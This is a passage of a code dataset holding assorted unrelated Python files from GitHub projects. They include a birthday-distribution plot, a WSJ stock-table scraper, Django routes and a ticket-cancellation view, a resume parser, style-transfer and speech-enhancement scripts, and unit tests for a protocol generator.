plt\n\nex=pd.read_excel('2019年12月学业水平考试2018级考生成绩.xls')\nprint(ex.iloc[0,5:10])\n\nmatplotlib.rcParams['font.sans-serif']=['SimHei'] \nmatplotlib.rcParams['axes.unicode_minus']=False\n#plt.ylim(0,900)\n\ndef al(rects):\n\tn=0\n\tfor i in rects:\n\t\tplt.text(i.get_x()+i.get_width()/2,i.get_height()*1.03,i.get_height(),ha='center',va='bottom',fontsize='large')\n\n\ntag=list(ex.iloc[0,5:10])\nprint(tag)\ncolor='rgby'\n\n#c=collections.Counter([ex.iloc[i,4][6:14] for i in range(1,1332)])\nc=collections.Counter([ex.iloc[i,4][10:14] for i in range(1,1332)]).most_common(50)\nname_list=['%d月%d日' % (int(i[0])//100,int(i[0])%100) for i in c]\nc=[i[1] for i in c]\nprint(c)\nprint(len(c))\nprint(name_list)\nplt.ylim(0,20)\nplt.title('浦中高二生日月份分布',fontsize='x-large')\n#name_list=['%d月'%i for i in range(1,13)]\nx=np.linspace(0,len(c),len(c))\nal(plt.bar(x,c,color=['red','green','blue','yellow','pink','lime','royalblue']))\nplt.xticks(x,name_list,rotation=45)\nplt.yticks(np.linspace(0,20,21))\n\n\nplt.show()\n","repo_name":"ladeng07/-Python-","sub_path":"浦中数据分析/精确生日分析.py","file_name":"精确生日分析.py","file_ext":"py","file_size_in_byte":1127,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"68"} +{"seq_id":"27473456031","text":"'''\nAuthor: Jordan Ott\nDate: February 20th, 2017\nDescription: This module scrapes the top gainers and losers from the New York stock market over the past\n150 business days and outputs the data to csv files.\nRequirements: \n\tpandas\n\tselenium\n\tfirefox\n'''\nimport time\nimport pandas as pd\n# BDay is business day, not birthday...\nfrom pandas.tseries.offsets import BDay\nfrom selenium import webdriver\n\n# URLs for gainers and decliners using the wall street journal\ngainers = 
[\"http://online.wsj.com/mdc/public/page/2_3021-gainnyse-gainer-\",\".html?mod=mdc_pastcalendar\"]\ndecliners = [\"http://online.wsj.com/mdc/public/page/2_3021-losenyse-loser-\",\".html?mod=mdc_pastcalendar\"]\n\ndef build_past_url(days_since_current,stock_movement):\n\ttoday = pd.datetime.today()\n\tpast_date = today - BDay(days_since_current)\n\tdate = past_date.strftime('%Y%m%d')\n\turl = stock_movement[0] + date + stock_movement[1]\n\treturn url,date\n\ndef scrape_table(data_file,url,date):\n\tdriver.get(url)\n\ttbody = driver.find_elements_by_css_selector('tbody')\n\ttable_body = tbody[5]\n\tif len(tbody) == 10:\n\t\ttable_body = tbody[6]\n\ttable_rows = table_body.find_elements_by_css_selector(\"tr\")\n\tfor index in range(1,len(table_rows)):\n\t\tindividual_row = table_rows[index].find_elements_by_css_selector(\"td\")\n\t\tcompany_name = individual_row[1].find_elements_by_css_selector('a')[0].text\n\t\tcompany_name = company_name[company_name.find(\"(\")+1:company_name.find(\")\")]\n\t\tprice = individual_row[2].text\n\t\tdollar_change = individual_row[3].text\n\t\tpercent_change = individual_row[4].text\n\t\tline = date +','+ company_name +','+ price +','+ dollar_change +','+ percent_change +'\\n'\n\t\t\n\t\tdata_file.write(line)\n\t\n# 150 for last 150 business days\n'''\nfor num in range(1,150):\n\tgainers_url,date = build_past_url(num,gainers)\n\tdecliners_url,date = build_past_url(num,decliners)\n\tscrape_table(gainers_file,gainers_url,date)\n\tscrape_table(decliners_file,decliners_url,date)\n\tprint(num)\n'''\ndef get_daily():\n\tdriver = webdriver.Firefox()\n\n\tgainers_file = open(\"gainers.csv\",'w')\n\tdecliners_file = open(\"decliners.csv\",'w')\n\t\n\tgainers_url = \"http://online.wsj.com/mdc/public/page/2_3021-gainnyse-gainer.html\"\n\tdecliners_url = \"http://online.wsj.com/mdc/public/page/2_3021-losenyse-loser.html\"\n\tdate = pd.datetime.today().strftime('%Y%m%d')\n\n\tscrape_table(gainers_file,gainers_url,date)\n\tscrape_table(decliners_file,decliners_url,date)\n\n\tgainers_file.close()\n\tdecliners_file.close()\n\tdriver.quit()\n","repo_name":"jordanott/Stock-Trading-Bot","sub_path":"stock_scrapper.py","file_name":"stock_scrapper.py","file_ext":"py","file_size_in_byte":2435,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"68"} +{"seq_id":"73561166937","text":"\"\"\"MedicalEgzersiz URL Configuration\n\nThe `urlpatterns` list routes URLs to views. For more information please see:\n https://docs.djangoproject.com/en/3.1/topics/http/urls/\nExamples:\nFunction views\n 1. Add an import: from my_app import views\n 2. Add a URL to urlpatterns: path('', views.home, name='home')\nClass-based views\n 1. Add an import: from other_app.views import Home\n 2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')\nIncluding another URLconf\n 1. Import the include() function: from django.urls import include, path\n 2. 
Add a URL to urlpatterns: path('blog/', include('blog.urls'))\n\"\"\"\nfrom django.contrib.auth import views as auth_views\nfrom django.conf import settings\nfrom django.conf.urls.static import static\nfrom django.contrib import admin\nfrom django.urls import path, include\n\nfrom MedicalEgzersiz import views\n\nurlpatterns = [\n path('admin/', admin.site.urls),\n path('',views.homepage,name='home-page'),\n path('home/dashboard', views.home, name='home-dashboard'),\n\n path('login/', auth_views.LoginView.as_view(template_name='pages/login.html'), name='login'),\n path('logout/', auth_views.LogoutView.as_view(template_name='pages/logout.html'), name='logout'),\n path('personal_register/', auth_views.LoginView.as_view(template_name='pages/personal_register.html'),\n name='personal_register'),\n path('registration/', include('registration.urls')),\n path('fitness/', include('fitness.urls')),\n path('postural/', include('postural.urls')),\n path('medical/', include('medical.urls')),\n path('athletic/', include('athletic.urls')),\n path('exercise_prescription/', include('exercise_prescription.urls')),\n path('corrective_exercise/', include('corrective_exercise.urls')),\n path('medical_exercise/', include('medical_exercise.urls')),\n path('athletic_development/', include('athletic_development.urls')),\n path('exercise_tracking/', include('exercise_tracking.urls')),\n path('finance_module/', include('finance_module.urls')),\n path('reporting_analysis/', include('reporting_analysis.urls')),\n path('forms_contents/', include('forms_contents.urls')),\n path('settings/', include('settings.urls')),\n path('pilates/', include('pilates.urls')),\n path('metabolic/', include('metabolic.urls')),\n\n ] \\\n + static(settings.MEDIA_URL, document_root=settings.MEDIA_ROOT) \\\n + static(settings.STATIC_URL, document_root=settings.STATIC_ROOT)\n","repo_name":"cetinercelik/FitnessMonitor","sub_path":"MedicalEgzersiz/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":2819,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"32927646113","text":"from . 
import utils\nimport pdfx\nfrom pyresparser import ResumeParser\nimport random\n\n\n\nclass ResumeExtract(object):\n def __init__(self, fileName):\n self.__details = {\n 'personal_details': {\n 'name': None,\n 'email': None,\n 'mobile_number': None,\n },\n 'skills': None,\n 'education': None,\n 'experience': None,\n 'no_of_pages': None,\n 'links': None,\n 'total_experience': None,\n 'projects': None,\n 'achievements': None,\n 'hobbies': None,\n 'score':None\n }\n self.__fileName = fileName\n\n def __get_details(self, fileName):\n # Modify and regroup extracted data\n pdf = pdfx.PDFx(fileName)\n links = pdf.get_references_as_dict()\n data = ResumeParser(fileName).get_extracted_data()\n\n self.__details[\"personal_details\"]['name'] = data[\"name\"]\n self.__details[\"personal_details\"]['email'] = data[\"email\"]\n self.__details[\"personal_details\"]['mobile_number'] = data[\"mobile_number\"]\n self.__details[\"skills\"] = data[\"skills\"]\n self.__details[\"education\"] = data[\"degree\"]\n self.__details[\"projects\"] = utils.getProjects()\n self.__details[\"achievements\"] = utils.getAchievements()\n self.__details[\"hobbies\"] = utils.getHobbies()\n self.__details[\"experience\"] = data[\"experience\"]\n self.__details[\"no_of_pages\"] = data[\"no_of_pages\"]\n self.__details[\"links\"] = utils.getLinks(links)\n self.__details[\"total_experience\"] = data[\"total_experience\"]\n # For testing, replace with real algo later\n self.__details[\"score\"] = random.randint(60,100)\n\n return self.__details\n\n def get_data(self):\n # Return grouped and modified data\n return self.__get_details(self.__fileName)\n","repo_name":"Yashdew/Assessor","sub_path":"api/resume/extraction/resumeextraction.py","file_name":"resumeextraction.py","file_ext":"py","file_size_in_byte":1901,"program_lang":"python","lang":"en","doc_type":"code","stars":16,"dataset":"github-code","pt":"68"} +{"seq_id":"3975609272","text":"import tensorflow as tf\nfrom .utils import tensor_to_image\nfrom .models import TransformModel\nimport PIL\nimport numpy as np\nimport IPython.display as display\nimport time\nfrom datetime import datetime\nimport os\n\n\ndef tensor_to_image(tensor):\n tensor = np.array(tensor, dtype=np.uint8)\n if np.ndim(tensor) > 3:\n assert tensor.shape[0] == 1\n tensor = tensor[0]\n return PIL.Image.fromarray(tensor)\n\n\ndef FastStyleTransfer(image_type, image_path):\n opt = tf.keras.optimizers.Adam(learning_rate=1e-3)\n train = TransformModel()\n model_save_path = os.getcwd() + '/FastStyleTransfer/' + image_type\n ckpt = tf.train.Checkpoint(step=tf.Variable(0), optimizer=opt, net=train)\n manager = tf.train.CheckpointManager(\n ckpt, model_save_path, max_to_keep=3)\n ckpt.restore(manager.latest_checkpoint)\n net = ckpt.net\n image = PIL.Image.open(image_path)\n image = np.array(image, dtype=np.float32)\n\n if len(image.shape) == 2:\n image = np.stack((image, image, image))\n # Channel=4 인 경우\n elif image.shape[-1] == 4:\n image = PIL.Image.open(image_path).convert('RGB')\n image = np.array(image, dtype=np.float32)\n # Channel=2 인 경우\n elif image.shape[-1] == 2:\n image = 255.-image[:,:,1]\n image = np.dstack((image, image, image))\n # batch_size 추가 (tensorflow는 4차원 tensor가 입력으로 주어짐)\n\n image = np.expand_dims(image, axis=0)\n # with tf.device('/device:XLA_CPU:0'):\n # train = TransformModel()\n # styles = net(image)\n\n train = TransformModel()\n styles = net(image)\n\n image = tensor_to_image(styles)\n time = str(datetime.now().hour) + str(datetime.now().minute) + \\\n str(datetime.now().second)\n 
result_name = f'result_{time}.jpg'\n UPLOAD_URL = os.getcwd() + '/static/faststyletransfer/result/' + result_name\n image.save(UPLOAD_URL)\n return result_name\n","repo_name":"ContecPluto/SSAFY-ART","sub_path":"flask_server/FastStyleTransfer/run.py","file_name":"run.py","file_ext":"py","file_size_in_byte":1918,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"21027037686","text":"import os, argparse, torch, random, sys\nfrom Trainer import train, test\nfrom Load_model import Load_SE_model, Load_data, Load_data_VC\nfrom utils.util import check_folder\nfrom utils.load_asr_data import load_y_dict\nfrom tensorboardX import SummaryWriter\nfrom CombinedModel import CombinedModel, CombinedModel_VC\nfrom espnet.nets.pytorch_backend.transformer.optimizer import get_std_opt\nfrom espnet.asr.asr_utils import get_model_conf\nimport torch.backends.cudnn as cudnn\nimport pandas as pd\n# import pdb\n\nos.environ[\"CUDA_VISIBLE_DEVICES\"] = \"4\"\n# fix random\nSEED = 999\nrandom.seed(SEED)\ntorch.manual_seed(SEED)\ncudnn.deterministic = True\n\n\n\ndef get_args():\n parser = argparse.ArgumentParser()\n parser.add_argument('--mode', type=str, default='train')\n #####\n parser.add_argument('--train_noisy', type=str, default='')\n parser.add_argument('--train_clean', type=str, default='')\n parser.add_argument('--test_noisy', type=str, default='')\n parser.add_argument('--test_clean', type=str, default='')\n parser.add_argument('--out_path', type=str, default='')\n #####\n parser.add_argument('--epochs', type=int, default=150)\n parser.add_argument('--batch_size', type=int, default=4) \n parser.add_argument('--lr', type=float, default=0.00005)\n parser.add_argument('--loss_fn', type=str, default='l1')\n parser.add_argument('--optim', type=str, default='adam')\n parser.add_argument('--SEmodel', type=str, default='transformerencoder_03') \n #####\n parser.add_argument('--val_ratio', type=float, default = 0.1)\n parser.add_argument('--train_num', type=int, default = None)\n parser.add_argument('--test_num', type=int, default = None)\n #####\n parser.add_argument('--Espnet_path', type=str, default=None)\n parser.add_argument('--ASRmodel_path', type=str, default='data/ASRmodel.acc.best.entire')\n parser.add_argument('--VCmodel_path', type=str, default='data/TTSmodel.pretrained.entire')\n parser.add_argument('--VC_test_json', type=str, default=None)\n #####\n parser.add_argument('--alpha', type=float, default=0.001) #loss = (1 - self.alpha) * SEloss + self.alpha * ASRloss\n parser.add_argument('--alpha_epoch', type=int, default=70) # alpha = 0 when epoch < alpha_epoch\n parser.add_argument('--asr_y_path', type=str, default='data/data_test.json,data/data_train_dev.json,data/data_train_nodev.json') \n parser.add_argument('--gpu', type=str, default='0')\n parser.add_argument('--target', type=str, default='MAP') #'MAP' or 'IRM'\n parser.add_argument('--task', type=str, default='DNS_SE') \n parser.add_argument('--resume' , action='store_true')\n parser.add_argument('--retrain', action='store_true')\n parser.add_argument('--corpus', type=str, default=\"TIMIT\") # corpus: TIMIT, TMHINT, TMHINT_DYS\n parser.add_argument('--asr_result', type=str, default=None)\n parser.add_argument('--tag', type=str, default=\"\")\n parser.add_argument('--after_alpha_epoch', action='store_true') # on when test or retrain using after_alpha_epoch model\n parser.add_argument('--re_epochs', type=int, default=150)\n parser.add_argument('--checkpoint', type=str, default=None)\n args = 
parser.parse_args()\n args = get_path(args)\n return args\n\ndef get_path(args):\n tag_str = \"\"\n if args.tag:\n tag_str = \"_\" + args.tag\n args.checkpoint_path = f'{args.out_path}/checkpoint/{args.SEmodel}{tag_str}_{args.target}_epochs{args.epochs}' \\\n f'_{args.optim}_{args.loss_fn}_alpha{args.alpha}_alpha_epoch{args.alpha_epoch}_batch{args.batch_size}_'\\\n f'lr{args.lr}.pth.tar'\n args.model_path = f'{args.out_path}/save_model/{args.SEmodel}{tag_str}_{args.target}_epochs{args.epochs}' \\\n f'_{args.optim}_{args.loss_fn}_alpha{args.alpha}_alpha_epoch{args.alpha_epoch}_batch{args.batch_size}_'\\\n f'lr{args.lr}.pth.tar'\n args.score_path = f'{args.out_path}/Result/{args.SEmodel}{tag_str}_{args.target}_epochs{args.epochs}' \\\n f'_{args.optim}_{args.loss_fn}_alpha{args.alpha}_alpha_epoch{args.alpha_epoch}_batch{args.batch_size}_'\\\n f'lr{args.lr}.csv'\n\n if args.after_alpha_epoch:\n args.model_path = args.model_path.replace(\"_alpha_epoch\",\"_after_alpha_epoch\")\n args.checkpoint_path = args.checkpoint_path.replace(\"_alpha_epoch\",\"_after_alpha_epoch\")\n args.score_path = args.score_path.replace(\"_alpha_epoch\",\"_after_alpha_epoch\")\n\n args.enhance_path = f'{args.out_path}/Enhanced/{args.SEmodel}/'\n return args\n\n\nif __name__ == '__main__':\n # get current path\n cwd = os.path.dirname(os.path.abspath(__file__))\n print(cwd)\n print(SEED)\n \n # get and process arguments\n args = get_args()\n \n # tensorboard\n writer = SummaryWriter(f'{args.out_path}/logs')\n\n \n \n if args.corpus==\"TMHINT_DYS\":\n if args.mode == 'test':\n print(\"Error: Run test using the VC script!\")\n exit()\n exit()\n exit()\n \n # TMHINT Train\n epoch=0\n args.checkpoint_path=args.checkpoint_path.replace(\"transformerencoder_03\",\"VCmodel\")\n args.model_path=args.model_path.replace(\"transformerencoder_03\",\"VCmodel\")\n args.score_path=args.score_path.replace(\"transformerencoder_03\",\"VCmodel\")\n \n if args.retrain or args.resume:\n idim, odim, train_args = get_model_conf(args.model_path, None)\n semodel, epoch, best_loss, optimizer, criterion, device = Load_SE_model(args, idim, odim, train_args)\n model = CombinedModel_VC(args,semodel)\n else:\n best_loss=1000\n device = torch.device(f'cuda:{args.gpu}')\n model = CombinedModel_VC(args)\n \n loader = Load_data_VC(args, model.SEmodel.args)\n \n else:\n # load and construct the model\n semodel, epoch, best_loss, optimizer, secriterion, device = Load_SE_model(args)\n model = CombinedModel(args, semodel, secriterion)\n if args.mode == 'train':\n loader = Load_data(args)\n else:\n asr_dict = load_y_dict(args)\n\n\n\n # control parameter\n if args.mode == 'train':\n for param in model.SEmodel.parameters():\n param.requires_grad = True\n else:\n for param in model.SEmodel.parameters():\n param.requires_grad = False\n\n for param in model.ASRmodel.parameters():\n param.requires_grad = False\n \n # if args.retrain:\n # args.epochs = args.re_epochs \n \n \n try:\n if args.mode == 'train':\n if args.corpus==\"TMHINT_DYS\":\n # --adim, default=384, type=int, \"Number of attention transformation dimensions\"\n optimizer = get_std_opt(model.SEmodel.parameters(), 384, model.SEmodel.args.transformer_warmup_steps, model.SEmodel.args.transformer_lr)\n train(model, args.epochs, epoch, best_loss, optimizer, \n device, loader, writer, args.model_path, args)\n \n # mode==\"test\"\n else: \n test(model, device, args.test_noisy, args.test_clean, asr_dict, args.enhance_path, args.score_path, args)\n \n except KeyboardInterrupt:\n state_dict = {\n 'epoch': 
epoch,\n 'model': model.state_dict(),\n 'optimizer': optimizer.state_dict(),\n 'best_loss': best_loss\n }\n check_folder(args.checkpoint_path)\n torch.save(state_dict, args.checkpoint_path)\n print('Saved interrupt')\n try:\n sys.exit(0)\n except SystemExit:\n os._exit(0)\n","repo_name":"neillu23/E2ESE","sub_path":"PytorchSE/secode/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":7623,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"68"} +{"seq_id":"72708846296","text":"from django.shortcuts import render,render_to_response\nfrom django.http import HttpResponseRedirect\nfrom django.template.context_processors import csrf\nfrom BookTicket.models import BookedTicketDetails,PassengerDetails,TrainBooked\nfrom django.core.exceptions import ObjectDoesNotExist\n\n# Create your views here.\n\ndef cancel_view(request):\n\tc={}\n\tc.update(csrf(request))\n\ttry:\n\t\trequest.session['username']\n\texcept KeyError:\n\t\treturn HttpResponseRedirect('/loginModule/loginPage/',c)\n\telse:\n\t\treturn render_to_response('cancelTicket.html',c)\n\ndef cancel_validate(request):\n\tc={}\n\tc.update(csrf(request))\n\ttry:\n\t\trequest.session['username']\n\texcept KeyError:\n\t\treturn HttpResponseRedirect('/loginModule/loginPage/',c)\n\telse:\n\t\tpnr=request.POST.get('pnr_number','')\n\t\tif(len(pnr)!=9):\n\t\t\tmsg=\"PNR Number Should Be Of Length 9...\"\n\t\t\tc.update({'errorMsg':msg})\n\t\t\treturn render_to_response('invalidcancelTicket.html',c)\n\n\t\ttry:\n\t\t\tt=BookedTicketDetails.objects.get(PNRno=pnr)\n\t\texcept ObjectDoesNotExist:\n\t\t\tmsg=\"PLEASE ENTER VALID PNR NUMBER....\"\n\t\t\tc.update({'errorMsg':msg})\n\t\t\treturn render_to_response('invalidcancelTicket.html',c)\n\t\telse:\n\t\t\tif t.username!=request.session['username']:\t\n\t\t\t\tmsg=\"PLEASE ENTER VALID PNR NUMBER....\"\n\t\t\t\tc.update({'errorMsg':msg})\n\t\t\t\treturn render_to_response('invalidcancelTicket.html',c)\n\t\t\telse:\n\t\t\t\tp=PassengerDetails.objects.filter(PNRno=t)\n\t\t\t\ttb=TrainBooked.objects.get(date=t.doj_id)\n\t\t\t\ttseat=0\n\t\t\t\tplist=list(p)\n\t\t\t\tcl=plist[0].coachNo[0:2]\n\t\t\t\trefund=t.totalPrice\n\t\t\t\tfor x in p:\n\t\t\t\t\ttseat=tseat+1\n\t\t\t\tif cl=='CC':\n\t\t\t\t\ttb.availableCC=tb.availableCC+tseat\n\t\t\t\t\tif refund > 120:\n\t\t\t\t\t\trefund=refund-tseat*120\n\t\t\t\t\telse:\n\t\t\t\t\t\trefund=0\n\t\t\t\telse:\n\t\t\t\t\ttb.available2S=tb.available2S+tseat\n\t\t\t\t\tif refund > 60:\n\t\t\t\t\t\trefund=refund-tseat*60\n\t\t\t\t\telse:\n\t\t\t\t\t\trefund=0\n\t\t\t\ttb.save()\n\t\t\t\tt.delete()\n\t\t\t\tc.update({'pnr':pnr})\n\t\t\t\tc.update({'tp':refund})\t\t\t\t\n\n\t\t\t\treturn render_to_response('confirmCancel.html',c)","repo_name":"ChintalJain/OnlineRailwayReservationSystemUsingPython","sub_path":"CancelTicket/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1948,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"68"} +{"seq_id":"35308855753","text":"# -*- coding: utf-8 -*-\n\"\"\"\nSplit factors in the 'grid' dataFrame into test/train datasets\n\n First split the data by order_id and then get the associated rows from \n the factors table.\n\n\"\"\"\n\ntestsize = 0.2\n\n# fields to drop\nfdrop = ['label', 'eval_set', 'order_id']\n\n# extract the \"development\" data from the competition \"test\" data\ndev_factors = grid[grid.eval_set != 'test']\nsubmission_factors = grid[grid.eval_set == 'test']\n\n# split 'dev' data by orders \notemp = 
pd.DataFrame((dev_factors.order_id.unique()), columns=['order_id'])\no_train, o_test = train_test_split(otemp, test_size=testsize, random_state=22)\n\n\n# Get the data rows for the corresponding test/train orders\n\nX_train = pd.merge(o_train, dev_factors)\ny_train = X_train.label\nX_train = X_train.drop(fdrop, axis=1)\n\nX_test = pd.merge(o_test, dev_factors)\ny_test = X_test.label\nX_test = X_test.drop(fdrop, axis=1)\n \n\n# Get the submission factors\n\n#y_sub = submission_factors.label\nX_sub = submission_factors.drop(fdrop, axis=1)\n\n\n\n\n","repo_name":"rosez/KaggleMarketBasketAnalysis","sub_path":"Modeling/30SplitTrainTestSubmissionData.py","file_name":"30SplitTrainTestSubmissionData.py","file_ext":"py","file_size_in_byte":1003,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"29330067136","text":"import logging\nimport os\nimport shutil\nimport tempfile\nfrom pathlib import Path\nfrom subprocess import CalledProcessError # nosec\nfrom unittest import TestCase, mock\n\nfrom aea.protocols.generator.common import (\n _camel_case_to_snake_case,\n _create_protocol_file,\n _get_sub_types_of_compositional_types,\n _has_matched_brackets,\n _includes_custom_type,\n _match_brackets,\n _python_pt_or_ct_type_to_proto_type,\n _to_camel_case,\n _union_sub_type_to_protobuf_variable_name,\n apply_protolint,\n base_protolint_command,\n check_prerequisites,\n check_protobuf_using_protoc,\n compile_protobuf_using_protoc,\n is_installed,\n load_protocol_specification,\n try_run_black_formatting,\n try_run_isort_formatting,\n try_run_protoc,\n)\n\nfrom tests.test_aea.test_protocols.test_generator.common import (\n PATH_TO_T_PROTOCOL_SPECIFICATION,\n T_PROTOCOL_NAME,\n)\n\n\nlogger = logging.getLogger(\"aea\")\nlogging.basicConfig(level=logging.INFO)\n\n\ndef isort_is_not_installed_side_effect(*args, **kwargs):\n \"\"\"Isort not installed.\"\"\"\n return not args[0] == \"isort\"\n\n\ndef protolint_is_not_installed_side_effect(*args, **kwargs):\n \"\"\"Protolint not installed.\"\"\"\n return not args[0] == \"protolint\"\n\n\ndef black_is_not_installed_side_effect(*args, **kwargs):\n \"\"\"Black not installed.\"\"\"\n return not args[0] == \"black\"\n\n\ndef protoc_is_not_installed_side_effect(*args, **kwargs):\n \"\"\"Protoco not installed.\"\"\"\n return not args[0] == \"protoc\"\n\n\nclass TestCommon(TestCase):\n \"\"\"Test for generator/common.py.\"\"\"\n\n @classmethod\n def setup_class(cls):\n \"\"\"Setup test.\"\"\"\n cls.cwd = os.getcwd()\n cls.t = tempfile.mkdtemp()\n os.chdir(cls.t)\n\n def test_to_camel_case(self):\n \"\"\"Test the '_to_camel_case' method.\"\"\"\n input_text_1 = \"this_is_a_snake_case_text\"\n expected_1 = \"ThisIsASnakeCaseText\"\n output_1 = _to_camel_case(input_text_1)\n assert output_1 == expected_1\n\n input_text_2 = \"This_is_a_Snake_Case_text\"\n expected_2 = \"ThisIsASnakeCaseText\"\n output_2 = _to_camel_case(input_text_2)\n assert output_2 == expected_2\n\n def test_camel_case_to_snake_case(self):\n \"\"\"Test the '_camel_case_to_snake_case' method.\"\"\"\n input_text_1 = \"ThisIsASnakeCaseText\"\n expected_1 = \"this_is_a_snake_case_text\"\n output_1 = _camel_case_to_snake_case(input_text_1)\n assert output_1 == expected_1\n\n def test_match_brackets(\n self,\n ):\n \"\"\"Positive test the '_match_brackets' method.\"\"\"\n text_1 = \"[so[met[hi]]ng]\"\n assert _match_brackets(text_1, 0) == 14\n assert _match_brackets(text_1, 3) == 11\n assert _match_brackets(text_1, 7) == 10\n\n text_2 = 
\"[]]som[]et[hi[ng][sf]\"\n index_2 = 4\n with self.assertRaises(SyntaxError) as cm:\n _match_brackets(text_2, index_2)\n self.assertEqual(\n str(cm.exception),\n \"Index {} in 'text' is not an open bracket '['. It is {}\".format(\n index_2,\n text_2[index_2],\n ),\n )\n\n index_3 = 2\n with self.assertRaises(SyntaxError) as cm:\n _match_brackets(text_2, index_3)\n self.assertEqual(\n str(cm.exception),\n \"Index {} in 'text' is not an open bracket '['. It is {}\".format(\n index_3,\n text_2[index_3],\n ),\n )\n\n index_4 = 10\n with self.assertRaises(SyntaxError) as cm:\n _match_brackets(text_2, index_4)\n self.assertEqual(\n str(cm.exception),\n \"No matching closing bracket ']' for the opening bracket '[' at {} \"\n + str(index_4),\n )\n\n def test_has_matched_brackets(\n self,\n ):\n \"\"\"Positive test the '_has_matched_brackets' method.\"\"\"\n valid_text_1 = \"[so[met[hi]]ng]\"\n assert _has_matched_brackets(valid_text_1) is True\n\n valid_text_2 = \"[[][[]]]\"\n assert _has_matched_brackets(valid_text_2) is True\n\n valid_text_3 = \"[[[[[[[]]]]]]]\"\n assert _has_matched_brackets(valid_text_3) is True\n\n invalid_text_1 = \"[]]som[]et[hi[ng][sf]\"\n assert _has_matched_brackets(invalid_text_1) is False\n\n invalid_text_2 = \"[]][][[][]\"\n assert _has_matched_brackets(invalid_text_2) is False\n\n invalid_text_3 = \"[]]\"\n assert _has_matched_brackets(invalid_text_3) is False\n\n invalid_text_4 = \"[[]\"\n assert _has_matched_brackets(invalid_text_4) is False\n\n def test_get_sub_types_of_compositional_types_positive(\n self,\n ):\n \"\"\"Positive test the '_get_sub_types_of_compositional_types' method.\"\"\"\n composition_type_1 = \"pt:set[pt:int, integer, bool]\"\n expected_1 = (\"pt:int\", \"integer\", \"bool\")\n assert _get_sub_types_of_compositional_types(composition_type_1) == expected_1\n\n composition_type_2 = \"FrozenSet[something, anotherthing]\"\n expected_2 = (\"something\", \"anotherthing\")\n assert _get_sub_types_of_compositional_types(composition_type_2) == expected_2\n\n composition_type_3 = \"pt:list[pt:str]\"\n expected_3 = (\"pt:str\",)\n assert _get_sub_types_of_compositional_types(composition_type_3) == expected_3\n\n composition_type_4 = \"Tuple[bytes, ...]\"\n expected_4 = (\"bytes\",)\n assert _get_sub_types_of_compositional_types(composition_type_4) == expected_4\n\n composition_type_5 = \"pt:dict[pt:int, pt:int]\"\n expected_5 = (\"pt:int\", \"pt:int\")\n assert _get_sub_types_of_compositional_types(composition_type_5) == expected_5\n\n composition_type_6 = \"Dict[bool, float]\"\n expected_6 = (\"bool\", \"float\")\n assert _get_sub_types_of_compositional_types(composition_type_6) == expected_6\n\n composition_type_7 = \"pt:union[ct:DataModel, pt:bytes, pt:int, pt:bool, pt:float, pt:str, pt:set[pt:int], pt:list[pt:bool], pt:dict[pt:str,pt:str]]\"\n expected_7 = (\n \"ct:DataModel\",\n \"pt:bytes\",\n \"pt:int\",\n \"pt:bool\",\n \"pt:float\",\n \"pt:str\",\n \"pt:set[pt:int]\",\n \"pt:list[pt:bool]\",\n \"pt:dict[pt:str,pt:str]\",\n )\n assert _get_sub_types_of_compositional_types(composition_type_7) == expected_7\n\n composition_type_8 = \"Union[int, Tuple[bool, ...]]\"\n expected_8 = (\"int\", \"Tuple[bool, ...]\")\n assert _get_sub_types_of_compositional_types(composition_type_8) == expected_8\n\n composition_type_9 = (\n \"Union[DataModel, FrozenSet[int], Tuple[bool, ...], bytes, Dict[bool,float], int, \"\n \"FrozenSet[bool], Dict[int, str], Tuple[str, ...], bool, float, str, Dict[str, str]]\"\n )\n expected_9 = (\n \"DataModel\",\n 
\"FrozenSet[int]\",\n \"Tuple[bool, ...]\",\n \"bytes\",\n \"Dict[bool,float]\",\n \"int\",\n \"FrozenSet[bool]\",\n \"Dict[int, str]\",\n \"Tuple[str, ...]\",\n \"bool\",\n \"float\",\n \"str\",\n \"Dict[str, str]\",\n )\n assert _get_sub_types_of_compositional_types(composition_type_9) == expected_9\n\n composition_type_10 = \"pt:optional[pt:union[ct:DataModel, pt:bytes, pt:int, pt:bool, pt:float, pt:str, pt:set[pt:int], pt:list[pt:bool], pt:dict[pt:str,pt:str]]]\"\n expected_10 = (\n \"pt:union[ct:DataModel, pt:bytes, pt:int, pt:bool, pt:float, pt:str, pt:set[pt:int], pt:list[pt:bool], pt:dict[pt:str,pt:str]]\",\n )\n assert _get_sub_types_of_compositional_types(composition_type_10) == expected_10\n\n composition_type_11 = \"Optional[Union[DataModel, bytes, int, bool, float, str, FrozenSet[int], Tuple[bool, ...], Dict[str,str]]]\"\n expected_11 = (\n \"Union[DataModel, bytes, int, bool, float, str, FrozenSet[int], Tuple[bool, ...], Dict[str,str]]\",\n )\n assert _get_sub_types_of_compositional_types(composition_type_11) == expected_11\n\n def test_get_sub_types_of_compositional_types_negative(\n self,\n ):\n \"\"\"Negative test the '_get_sub_types_of_compositional_types' method\"\"\"\n composition_type_1 = \"pt:int\"\n with self.assertRaises(SyntaxError) as cm:\n _get_sub_types_of_compositional_types(composition_type_1)\n self.assertEqual(\n str(cm.exception),\n \"{} is not a valid compositional type.\".format(composition_type_1),\n )\n\n composition_type_2 = \"pt:int[pt:DataModel]\"\n with self.assertRaises(SyntaxError) as cm:\n _get_sub_types_of_compositional_types(composition_type_2)\n self.assertEqual(\n str(cm.exception),\n \"{} is not a valid compositional type.\".format(composition_type_2),\n )\n\n composition_type_3 = \"pt:dict[pt:set[int, pt:list[pt:bool]]\"\n with self.assertRaises(SyntaxError) as cm:\n _get_sub_types_of_compositional_types(composition_type_3)\n self.assertEqual(\n str(cm.exception),\n \"Bad formatting. 
